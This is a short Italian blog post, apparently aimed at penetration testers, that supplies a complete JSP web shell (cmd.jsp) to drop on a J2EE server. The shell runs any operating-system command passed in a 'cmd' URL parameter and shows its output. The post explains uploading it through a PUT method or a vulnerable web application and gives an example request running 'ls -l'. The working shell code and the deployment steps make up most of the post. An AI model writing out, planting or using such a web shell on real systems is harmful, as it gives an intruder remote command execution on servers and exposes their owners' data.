Una shell, datemi una shell

Sei lì e nel buio della sala riunioni del tuo cliente, di fronte al tuo caffé da 0,34€ erogato da un dispenser mai pulito, hai trovato il modo di fare upload di codice Java su un J2EE container.

Photo by Jorge Brazil

Sei lì e nel buio della sala riunioni del tuo cliente, di fronte al tuo caffé da 0,34€ erogato da un dispenser mai pulito, hai trovato il modo di fare upload di codice Java su un J2EE container.

Che sia grazie ad un metodo PUT, che sia perché l’applicazione web ha è bucata come il groviera, vuoi una shell da buttare su al volo, qualcosa di veramente quick and dirty.

Salva questo file come shell.jsp e caricalo sul web server.

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

A questo punto ti basterà richiamare, l’url dell’applicazione vulnerabile più l’eventuale percorso dove hai fatto l’upload del file, più shell.jsp, passando come parametro il comando da eseguire:

http://poorwebsite.local/shell.jsp?cmd=ls%20-l
comments powered by Disqus